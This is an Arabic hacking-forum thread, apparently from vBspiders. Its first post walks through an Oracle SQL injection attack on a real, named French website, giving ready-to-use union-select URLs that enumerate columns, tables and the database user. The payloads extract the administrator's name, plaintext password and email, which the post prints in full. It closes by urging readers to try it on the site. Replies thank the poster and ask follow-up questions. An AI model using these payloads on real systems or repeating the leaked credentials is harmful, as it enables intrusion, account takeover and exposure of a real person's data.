![]() |
Oracle SQL Injection السلام عليكم ورحمه الله وبركاته الحمد لله رب العالمين والصلاه والسلام على نبي المرسلين محمد الصادق الامين سوف اطرح لكم لمحه بسيطه عن Oracle injection ,, الاوامر مثل sql injection يوجد اختلاف بسيط .. واكيد الشرح مارارح يكون مثل شروحات بلاك روز وتكل فقط لمحه كتابيه بسيطه \ http://www.cfpb.fr/cfpb_reseau_france.php?id=1 نستخرج الاعمده بالطريقه العاديه order by www.cfpb.fr/cfpb_reseau_france.php?id=1'+order+by+14-- - عدد العواميد 14 تعلمنا في sql injection استخدام الامر التالي union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 في الاوراكل بدل كتابه العواميد نخليها قيمه خاليه .. null اذن الامر سيكون بهذا الشكل union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,nul نستخدم الامر التالي في معرفه العمود المصاب http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ banner,null,null,null,null,null,null,null,null,nul l,null,null,null,null+from+v$version--+ نشرح الامر +from+v$version امر استخراج اصدار القاعده طيب ماعرفنا العمود المصاب نمرر كلمه banner على كل الاعمدة وهي عبارة بصمه للاستعلام عن العمود المصاب واذا كان صحيح يظهر لك اصدار القاعده CORE 10.2.0.4.0 Production عرفنا العمود المصاب نستخرج اسم اليوزر واسم القاعده بالامر http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ user,null,null,null,null,null,null,null,null,null, null,null,null,null+from+dual--+ في العمود رقم 1 نحط user ثم SYS.DATABASE_NAME عاد dual ماعرفت ايش فايدتها اعتقد انهاء الامر ,, الله اعلم اسم اليوزر : MEDIAC اسم القاعده : PORTAILN امر استخراج الجداول مع الحقول http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ rawtohex(table_name||chr(58)||column_name),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+USER_TAB_COLUMNS--+ rawtohex(table_name||chr(58)||column_name) rawtohex بدل الامر concat ||chr(58)|| = : USER_TAB_COLUMNS بدل information_schema راح يستخرج لنا الجداول والحقول مشفره ب hex نفك التشفير بتحويل الهيكس الى قيمه نصيه string موقع لفك التشفير : http://www.string-functions.com/hex-string.aspx نفك تشفير جميع الجداول حتى نحصل على مانريدة .. بعد فك التشفير وجدنا الجدول الذي يحتوي على حقل اليوزر والباسورد UTILISATEURS:ID UTILISATEURS:NOM UTILISATEURS:PASSWORD UTILISATEURS:EMAIL الان بقي لنا امر واحد وهو استخراج بيانات الادمن بالامر التالي http://www.cfpb.fr/cfpb_reseau_france.php?id=1%27+and+1=2+union+selec t+rawtohex(ID||chr(58)||NOM||chr(58)||PASSWORD||ch r(58)||EMAIL),null,null,null,null,null,null,null,n ull,null,null,null,null,null+from+UTILISATEURS--+ الامر واضح مايحتاج شرح في العمود المصاب طلبنا منه استخراج البيانات المخزنه في الحقول وفي نهايه الرابط from + جدول الادمن وهو UTILISATEURS .. راح تظهر لنا البيانات مشفره hex مثل ما قلنا نفك تشفيرها .. بتحويلها الى قيم نصيه string بيانات الادمن مشفره 313A447572616E643A6774726672746F763A66726564657269 632E647572616E6440636670622E6672 بعد فك التشفير 1:Durand:gtrfrtov:frederic.durand@cfpb.fr ان شاء الله تكون الفكرة وضحت ,, عشان تفهم طبق على الموقع |
رد: Oracle SQL Injection مشكووووووووووووور ياخوي شرح رائع ولو كان فيديو كان احلى بس سؤال عند استخراج الجداول هل نضع التخمين التشفير داخل هنا ||chr(58)|| ام نخمن الجدول من هنا بدون تشفير from+USER_TAB_COLUMNS ارجو اني ما اطلت عليك تحياتي لك |
رد: Oracle SQL Injection شكرا لك |
رد: Oracle SQL Injection مشكور على الشرح الرائع |
رد: Oracle SQL Injection اقتباس:
تابع المصدر من هنا والله انا مبتداء في اوراكل انا شفت الدرس عجبني وستفدت منو ونقلتو لكم حتى الجميع يستفيد سامحني ^_^ ممنوع الاشهار |
الساعة الآن 01:13 AM |
[ vBspiders.Com Network ]